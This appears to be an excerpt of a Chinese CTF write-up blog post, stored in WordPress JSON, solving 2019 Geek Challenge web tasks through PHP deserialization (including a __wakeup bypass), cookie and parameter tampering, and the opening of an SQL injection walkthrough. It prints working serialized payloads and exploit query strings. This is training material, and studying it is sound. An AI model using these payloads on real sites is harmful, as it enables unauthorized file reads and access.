\u6253\u5f00\u56fe\u7247\u5c31\u53ef\u4ee5\u770b\u51fa\u662f\u4e00\u9053\u53cd\u5e8f\u5217\u5316\u9898\u76ee\u3002\u53bb\u6389\u4e0d\u9700\u8981\u770b\u7684_construct\u548cwrite\u51fd\u6570\uff0c\u53ea\u770b\u5176\u4f59\u7684\u51fd\u6570\u4ee5\u53ca\u4e3b\u51fd\u6570\u53ef\u4ee5\u77e5\u9053\u5f53op=2\u65f6\u4f1a\u8c03\u7528read\u51fd\u6570\u6765\u8bfb\u53d6file_name\u6587\u4ef6\u7684\u5185\u5bb9\uff0c\u90a3\u4e48\u8ba9file_name=’flag.php’\u5373\u53ef\u3002\u6240\u4ee5\u6784\u9020\u51fapoc\uff1a \u8fd0\u884c\u540e\u5f97\u5230\u9700\u8981\u7684payload\uff1a O:11:”FileHandler”:3:{s:2:”op”;i:2;s:8:”filename”;s:8:”flag.php”;s:7:”content”;s:0:””;} \u7531\u4e3b\u51fd\u6570\u53ef\u4ee5\u77e5\u9053\u53d8\u91cfstr\u662f\u53ef\u63a7\u7684\uff0c\u6240\u4ee5\u6700\u7ec8payload\u62fc\u63a5\u597d\u540e\u662f\uff1a ?str=O:11:”FileHandler”:3:{s:2:”op”;i:2;s:8:”filename”;s:8:”flag.php”;s:7:”content”;s:0:””;} \u67e5\u770b\u6e90\u7801\u5f97\u5230flag [\u6781\u5ba2\u5927\u6311\u6218 2019] PHP \u6253\u5f00\u9776\u673a\u5c31\u63d0\u793a\u4e86\u8981\u627e\u7f51\u7ad9\u7684\u5907\u4efd\u6587\u4ef6\uff0c\u76f4\u63a5\u7528dirsearch\u626b\u4e00\u4e0b \u53d1\u73b0\u654f\u611f\u6587\u4ef6www.zip \u4e0b\u8f7d\u5e76\u89e3\u538b\u540e\u5f97\u5230\u51e0\u4e2a\u6587\u4ef6\uff0c\u5176\u4e2dflag.php\u76f4\u63a5\u6253\u5f00\u770b\u4e0d\u5230\u4ec0\u4e48\u4e1c\u897f \u4eceindex.php\u4e2d\u53ef\u4ee5\u770b\u5230\u4e0a\u9762\u8fd9\u4e32\u4ee3\u7801\uff0c\u8868\u793a\u901a\u8fc7GET\u65b9\u5f0f\u5f97\u5230select\u7684\u503c\u5e76\u5c06\u5176\u53cd\u5e8f\u5217\u5316\u3002\u8bf4\u660e\u53ef\u4ee5\u901a\u8fc7\u4f20\u5165\u5e8f\u5217\u5316\u540e\u7684\u4ee3\u7801\u4f5c\u4e3aselect\u7684\u503c\uff0c\u8ba9\u7a0b\u5e8f\u5c06select\u53cd\u5e8f\u5217\u5316\u540e\u5c06\u4f1a\u6267\u884c\u6211\u4eec\u4f20\u5165\u7684\u4ee3\u7801\uff0c\u4ece\u800c\u5b9e\u73b0\u4efb\u610f\u4ee3\u7801\u6267\u884c\uff08\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff09 \u63a5\u7740\u770bclass.php\uff0c\u7531\u4ee3\u7801\u53ef\u77e5\u9700\u8981\u5229\u7528construct\u51fd\u6570\u5206\u522b\u7ed9\u53d8\u91cfusername\u548cpassword\u8d4b\u503c\u4e3aadmin\u3001100\uff0c\u540c\u65f6\u8981\u9632\u6b62\u8c03\u7528wakeup\u51fd\u6570\u5bfc\u81f4username\u88ab\u91cd\u65b0\u8d4b\u503c\u6210guest\u3002\u4e8e\u662f\u6784\u9020\u51fapoc\uff1a \u8fd0\u884c\u7a0b\u5e8f\u5f97\u5230\u5e8f\u5217\u5316\u540e\u7684\u7ed3\u679c\uff1a O:4:”Name”:2:{s:14:”Nameusername”;s:5:”admin”;s:14:”Namepassword”;s:3:”100″;} \u7531\u4e8e\u9700\u8981\u7ed5\u8fc7wakeup\u51fd\u6570\uff0c\u6240\u4ee5\u5229\u7528wakeup\u51fd\u6570\u7684\u4e00\u4e2a\u6f0f\u6d1e\uff1a\u5f53\u5e8f\u5217\u5316\u540e\u7684\u5b57\u7b26\u4e2d\u6807\u660e\u5c5e\u6027\u6570\u91cf\u7684\u503c\u4e0e\u5b9e\u9645\u5c5e\u6027\u6570\u91cf\u4e0d\u4e00\u81f4\u65f6\u4f1a\u5bfc\u81f4\u4e0d\u89e6\u53d1wakeup\u51fd\u6570\uff0c\u6240\u4ee5\u6b64\u5904\u5c06”Name”\u540e\u9762\u76842\u6539\u4e3a\u5176\u5b83\u503c\uff08\u6b64\u5904\u6539\u4e3a3\uff09\u5373\u53ef\u7ed5\u8fc7wakeup\u51fd\u6570\u3002\u540c\u65f6\u7531\u4e8e\u5e8f\u5217\u5316\u540e\u4f1a\u628a\u539f\u672c\u7528\u4e8e\u8868\u793a\u53d8\u91cf\u7684private\u5c5e\u6027\u7684%00\u5b57\u7b26\u5c4f\u853d\u6389\uff0c\u6240\u4ee5\u8981\u5728\u5e8f\u5217\u5316\u7ed3\u679c\u4e2d\u7684\u53d8\u91cf\u524d\u8865\u4e0a\uff0c\u4e8e\u662f\u539f\u5148\u7684\u5e8f\u5217\u5316\u7ed3\u679c\u6539\u4e3a\uff1a O:4:”Name”:3:{s:14:”%00Name%00username”;s:5:”admin”;s:14:”%00Name%00password”;s:3:”100″;} \u5df2\u77e5\u53ef\u63a7\u53d8\u91cf\u662fselect\uff0c\u6240\u4ee5\u6700\u7ec8\u7684exp\u662f\uff1a ?select= O:4:”Name”:3:{s:14:”%00Name%00username”;s:5:”admin”;s:14:”%00Name%00password”;s:3:”100″;} [\u6781\u5ba2\u5927\u6311\u6218 2019] BuyFlag \u6253\u5f00\u9776\u673a\u540e\u901a\u8fc7MENU\u83dc\u5355\u8bbf\u95ee\u5230pay.php\u754c\u9762\uff0c\u53ef\u4ee5\u770b\u5230\u60f3\u8981\u5f97\u5230flag\u9996\u5148\u9700\u8981\u81ea\u5df1\u7684\u8eab\u4efd\u662fCUIT\u7684\u5b66\u751f\uff0c\u7136\u540e\u9700\u8981\u6b63\u786e\u7684\u5bc6\u7801\uff0c\u540c\u65f6\u9700\u8981100000000MONEY\u6765\u8d2d\u4e70flag\u3002\u4e00\u6b65\u6b65\u6765 \u67e5\u770b\u9875\u9762\u6e90\u7801\u53ef\u4ee5\u770b\u5230\u4e00\u6bb5\u6ce8\u91ca\u5185\u5bb9\uff0c\u63d0\u793a\u901a\u8fc7POST\u65b9\u5f0f\u5f97\u5230password\u7684\u503c\uff0c\u4e14\u8981\u8ba9password\u975e\u6570\u5b57\u540c\u65f6\u7b49\u4e8e404\uff0c\u7531\u4e8ephp\u662f\u5f31\u6bd4\u8f83\u7c7b\u578b\uff0c\u6240\u4ee5\u8ba9password\u4e3a404a\u5373\u53ef\u6ee1\u8db3\u4ee5\u4e0a\u4e24\u4e2a\u8981\u6c42 \u4f7f\u7528Burpsuit\u5de5\u5177\u6293\u5305\u53ef\u4ee5\u770b\u5230\u8bf7\u6c42\u5305\u4e2d\u7684cookie\u503c\u4e3auser=0\u3002\u53ef\u4ee5\u60f3\u5230\u4ee4user=1\u5373\u53ef\u8868\u793a\u81ea\u5df1\u8eab\u4efd\u4e3aCUIT\u7684student\u3002\u6700\u540e\u4e0d\u8981\u5fd8\u4e86\u7ed9MONEY\u8d4b\u503c\u4e3a100000000 \u7528Burpsuit\u6293\u5305\u540e\u6539\u5305\u4e3a\u4ee5\u4e0a\u503c\u540e\u53d1\u9001\u8bf7\u6c42\u5305 \u9875\u9762\u53d8\u5316\uff0c\u63d0\u793a\u8eab\u4efd\u3001\u5bc6\u7801\u90fd\u5bf9\u4e86\uff0c\u4f46MONEY\u503c\u592a\u957f\u4e86\u3002\u4e8e\u662f\u5c06100000000\u6539\u7528\u79d1\u5b66\u8ba1\u6570\u6cd5\u8868\u793a\u4e3a1e9 \u91cd\u65b0\u53d1\u9001\u8bf7\u6c42\u5305\uff0c\u6210\u529fbuy\u5230flag [\u6781\u5ba2\u5927\u6311\u6218 2019] –SQL\u6ce8\u5165\u7cfb\u5217 [EasySQL] \u6253\u5f00\u9776\u673a\u770b\u89c1\u767b\u5f55\u754c\u9762\uff0c\u76f4\u63a5\u5c1d\u8bd5\u7528order by [\u6570\u5b57]#\u6765\u67e5\u770b\u80fd\u6ce8\u5165\u7684\u5217\u3002\u6570\u5b57\u4e3a1-3\u7684\u65f6\u5019\u8bf4\u7528\u6237\u540d\u548c\u5bc6\u7801\u9519\u8bef\uff0c\u6570\u5b57\u4e3a4\u65f6\u9875\u9762\u62a5\u9519\uff0c\u8bf4\u660e\u5217\u6570\u4e3a3\u3002\uff08ps. \u2018#\u2019\u5b57\u7b26\u8981\u7528\u5bf9\u5e94\u7684url\u7f16\u7801%23\u6765\u8868\u793a\uff0c\u4e0d\u7136\u4f1a\u62a5\u9519\u3002\u4e00\u4e9b\u5e38\u89c1url\u7f16\u7801\uff1a\u2018 ‘ \u2019\u2014\u2014%27\uff1b\u7a7a\u683c\u2014\u2014%20;\u2018 […]<\/p>\n","protected":false},"author":1,"featured_media":112,"comment_status":"open","ping_status":"open","sticky":true,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-95","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wp"],"_links":{"self":[{"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=\/wp\/v2\/posts\/95"}],"collection":[{"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=95"}],"version-history":[{"count":42,"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=\/wp\/v2\/posts\/95\/revisions"}],"predecessor-version":[{"id":737,"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=\/wp\/v2\/posts\/95\/revisions\/737"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=\/wp\/v2\/media\/112"}],"wp:attachment":[{"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=95"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=95"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/mikuhacker.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=95"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}